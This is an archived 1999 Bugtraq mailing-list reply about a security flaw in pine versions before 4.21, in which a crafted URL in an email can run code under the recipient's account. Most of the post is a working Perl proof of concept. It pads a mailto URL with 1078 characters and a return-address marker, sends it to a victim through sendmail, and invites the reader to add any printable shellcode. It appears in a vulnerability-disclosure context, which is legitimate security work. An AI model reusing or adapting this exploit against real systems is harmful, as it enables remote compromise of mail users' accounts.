Bugtraq mailing list archives
Re: Caldera Pine Advisory
From: fygrave () EPR0 ORG (CyberPsychotic)
Date: Thu, 18 Nov 1999 21:43:14 +0500
~: Versions of pine prior to 4.21 had a security problem when viewing ~: URLs. By sending an email with a specially formatted URL embedded ~: in it, an attacker could cause arbitrary shell code to be executed ~: under the account of the victim user. ~: I don't know how dumb user should be to actually to become a victim of such exploitation. Not saying that the bug shouldn't be fixed anywayz. if anyone's interested: #!/usr/bin/perl $sploit="A" x 1078; $sploit .="\@1111"; # rh 6.0/pine4.10 would love return address 0x82d4528 # or higher.. open(FOO,"| /usr/sbin/sendmail -t"); print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n"; print FOO "Mail me: mailto:$sploit"; close(FOO); pull any shellcode you like (but mind it should contain only printable characters 0x20-xff worked for me). -Fyodor
Current thread:
- Notifying Vendors Kerb (Nov 18)
- (no subject) Anonymous (Nov 19)
- Caldera Pine Advisory Alfred Huger (Nov 22)
- Re: Caldera Pine Advisory CyberPsychotic (Nov 18)
- NetBeans/ Forte' Java IDE HTTP vulnerability Halcyon Skinner (Nov 23)